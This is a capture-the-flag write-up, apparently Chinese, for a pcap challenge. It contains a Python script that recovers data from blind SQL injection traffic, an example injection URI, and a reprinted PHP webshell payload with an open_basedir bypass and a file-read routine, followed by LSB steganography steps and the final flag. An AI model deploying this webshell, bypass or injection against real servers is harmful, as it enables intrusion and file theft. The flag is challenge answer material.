202403_QQ_httpSqlilab
Tags: 流量分析, SQL注入, 明文爆破, WebShell, PNG, LSB隐写
0x00. 题目
题目表述
附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件
附件名称:202403_QQ_httpSqlilab.zip
0x01. WP
1. 找到 hint 信息
在 Frame 21 中看到 hint：f1ag 被分为了两部分。
2. SQL 注入流量信息提取，得到 flag 的前半部分：用 `frame.len == 776` 过滤出布尔盲注判断为真的响应（该长度需先在 Wireshark 中确认），再从每个响应所对应请求的 URI（`http.response_for.uri`）中取出本次猜中的字符，按位置拼接。
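# -*- coding: utf-8 -*-
"""Recover the string brute-forced through a boolean-based blind SQL injection
from an HTTP capture (http_sqlilab.pcapng).

The capture holds one request per guessed character, of the form
    ...substr((select group_concat(password) from users where username='f1'),<pos>,1)='<char>' --+
Only responses whose frame length matches TRUE_RESPONSE_FILTER (the
"condition true" page size; confirm it in Wireshark first) are kept. The
guessed <char> is read back from the request URI each of them answers
(http.response_for.uri) and the characters are assembled by <pos>.
"""
import os
import re
import time

# Author: Jason.J.Hu
# Create : 2023/12/11

# Global parameters
CAP_PATH = "http_sqlilab.pcapng"
# Display filter selecting only the "true" responses of the blind injection.
# 776 is specific to this capture; another target page needs another length.
TRUE_RESPONSE_FILTER = "frame.len == 776"

# Example matched URI:
# http://127.0.0.1:3441/Less-5/?id=1'%20and%20substr((select%20group_concat(password)%20from%20users%20where%20username='f1'),1,1)='8'%20--+
# Group 1 = position argument of substr(), group 2 = the guessed character.
GUESS_RE = re.compile(r",(\d+),1\)='(.*?)'%20--+")


def extract_guess(uri):
    """Return (position, character) of a blind-SQLi probe URI, or None.

    None is returned for a missing URI (packets without http.response_for.uri)
    and for URIs that carry no substr(...,<pos>,1)='<char>' probe, so the
    caller never indexes into an empty match list.
    """
    if not uri:
        return None
    match = GUESS_RE.search(uri)
    if match is None:
        return None
    return int(match.group(1)), match.group(2)


def recover_secret(uris):
    """Assemble the brute-forced string from the probe URIs of the *true* responses.

    Characters are placed by the substr() position rather than by packet
    order, so duplicated or out-of-order probes do not corrupt the result;
    a later probe for the same position overwrites an earlier one. Positions
    never confirmed in the capture are filled with "?" so a gap is visible
    instead of silently shifting the following characters.
    """
    confirmed = {}
    for uri in uris:
        hit = extract_guess(uri)
        if hit is not None:
            pos, ch = hit
            confirmed[pos] = ch
    if not confirmed:
        return ""
    # substr() positions are 1-based.
    return "".join(confirmed.get(pos, "?") for pos in range(1, max(confirmed) + 1))


def main(cap_path=CAP_PATH, display_filter=TRUE_RESPONSE_FILTER):
    """Walk the capture, collect the probe URIs and print the recovered string.

    The string is also returned so the function is usable from a notebook.
    pyshark/nest_asyncio are imported here rather than at module level so the
    parsing helpers above can be imported and tested without tshark installed.
    """
    import pyshark
    import nest_asyncio

    # pyshark drives tshark through an asyncio loop; nest_asyncio lets that
    # run inside an already-running loop (e.g. a Jupyter kernel).
    nest_asyncio.apply()

    print(time.strftime("%H:%M:%S", time.localtime()), "HTTP分析开始 ... ...")
    uris = []
    cap = pyshark.FileCapture(cap_path, display_filter=display_filter)
    try:
        for pkt in cap:
            print("\r\tFrame Number: %s" % str(pkt.number), end="")
            for layer in pkt.layers:
                if layer.layer_name == "http":  # only the HTTP layer carries the URI
                    uris.append(layer.get_field_value("response_for_uri"))
    finally:
        cap.close()  # stop the tshark subprocess even if parsing fails midway
    print("\r")
    print(time.strftime("%H:%M:%S", time.localtime()), "HTTP分析结束。")
    secret = recover_secret(uris)
    print(secret)
    return secret


if __name__ == "__main__":
    main()
#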
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
3. WebShell 流量中得到 flag 后半部分
请求流量（WebShell 下发的 PHP 代码）:
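// --- Webshell prologue: hide errors, lift the time limit and, if
// open_basedir is set, escape it so the file read below is not confined. ---
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    // One element per path component of the open_basedir value (split on
    // "/" or "\"); its size is the number of ".." steps taken below.
    $oparr=preg_split("/\\\\|\//",$opdir);
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    // Scratch directory created inside the allowed tree and removed again at
    // the end. The captured line had lost the variable name; it is restored
    // from the mkdir($tmdir) call that follows.
    $tmdir=".72b3b4";
    mkdir($tmdir);
    @chdir($tmdir);
    // Relax open_basedir to the parent, climb with chdir("..") once per path
    // component, then relax it to "/" — the widely documented
    // chdir()/ini_set() open_basedir bypass.
    @ini_set("open_basedir","..");
    for($i=0;$i<sizeof($oparr);$i++){@chdir("..");}
    @ini_set("open_basedir","/");
    @rmdir($ocwd."/".$tmdir);
};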
// Response "encoder" hook. This variant is a plain pass-through: the output
// is returned unchanged (no encryption/encoding of the response body).
function asenc($out)
{
    return $out;
}
// Emit everything buffered since ob_start(), wrapped between two marker
// strings so the client can cut the real result out of the page content.
function asoutput()
{
    $buffered = ob_get_contents();
    ob_end_clean();
    // Each marker is split across two literals (joined: "540b9b8" and
    // "378d10"), presumably to avoid a static signature.
    echo "540" . "b9b8";
    echo @asenc($buffered);
    echo "378" . "d10";
}
// Command body: read one file and return its contents. The path comes from
// the POST parameter "w6d6e6bfdd971b", with its first two characters dropped
// and the remainder base64-decoded.
ob_start();
try {
    $path = base64_decode(substr($_POST["w6d6e6bfdd971b"], 2));
    $fh = @fopen($path, "r");
    // filesize() is false for unreadable/special files; read 4 KiB then.
    $size = filesize($path);
    echo(@fread($fh, $size ? $size : 4096));
    @fclose($fh);
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
w6d6e6bfdd971b=/var/www/html/sql-connections/ag
去掉响应前后的标记字符串（`540b9b8` / `378d10`）后，得到 flag 的后半部分。
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
4. 用十六进制编辑器将读出的数据另存为 PNG 文件，打开后内容空白；尝试进行 LSB 隐写解码，得到 flag。
flag:flag{8f5091fd-3be3-4a4c-adee-37d773627e25}
使用工具: Stegsolve / 随波逐流（一把梭）